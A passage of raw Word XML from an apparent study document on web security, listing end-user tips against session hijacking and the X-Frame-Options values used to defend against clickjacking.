          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Some of the most common ways to prevent session hijacking attacks are: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25278388" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EDCFC5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Share session IDs with only trusted sources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remember that session id may be included when sharing links or sending requests to websites. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948B0D3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Using a VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> prevents attackers from intercepting traffic, making stealing session IDs more difficult. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B47D05" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="241" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Don’t log in on open wireless networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A public, unencrypted Wi-Fi network invites a malicious hacker to steal your data. So, it’s best not to use that. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D1816" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="241" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Keep software updated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the latest security patches to prevent attackers from exploiting vulnerabilities to access users’ sessions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01D3CB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Always prefer to use sites with HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, as HTTPS means that the data your computer sends to the server is encrypted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26D762" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="241" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Don’t click on a link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you aren’t sure about the authenticity, as it might be a session hijacking attempt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26218CC4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="6" w:line="239" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>At the end of each session, log out.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you log out of your account, the session will terminate; you’ll also make the attacker log out, preventing him from hijacking the session. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021FD96" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="681F45C7" wp14:editId="12C4C347">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44660" name="Group 44660"/>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40" name="Shape 501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1" name="Shape 501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2" name="Shape 501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3" name="Shape 501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4" name="Shape 501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60" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50145" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50146" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50147" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50148" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5014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9136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2184486C" wp14:editId="6ADB119A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44661" name="Group 4466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50" name="Shape 501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1" name="Shape 501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52" name="Shape 501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3" name="Shape 501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54" name="Shape 501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61" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50155" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50156" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50157" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50158" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5015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sz w:val="24"/>
        </w:rPr>
        <w:t>Install antivirus and firewall software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on your system because they can detect and remove viruses while providing a solid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> against malware attacks and, eventually, session hijacking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A6125" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DB9CF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clickjacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E0D37" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Two general ways to defend against clickjacking: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E0112" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Client-side methods </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Client</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-side methods can be effective in some cases, but are considered  not to be a best practice, because they can be easily bypassed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C06C0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server-side methods –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server-side methods are recommended by security expert as an effective way to defend against clickjacking. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BCD38" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C8C2C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To prevent the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can jacking we can also change the X-frame-Options to  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA61FB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DENY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – does not allow any domain to display this page within a frame </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EDA689" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SAMEORIGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – allows the current page to be displayed in a frame on another page, but only within the current domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031AB322" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ALLOW-FROM URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – allows the current page to be displayed in a frame, but only in a specific URI – for example </w:t>
      </w:r>
      <w:hyperlink r:id="rId146">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>www.example.com/frame</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId147">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId148">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>page</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId149">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3256DF44" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C00B39" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677B5A2E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F73B3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57465D76" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C63FE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14D5DF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="713F2DE3" wp14:editId="1FD061DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="43986" name="Group 43986"/>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60" name="Shape 5016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1" name="Shape 5016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2" name="Shape 5016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3" name="Shape 5016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4" name="Shape 5016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86" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50165" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50166" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50167" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
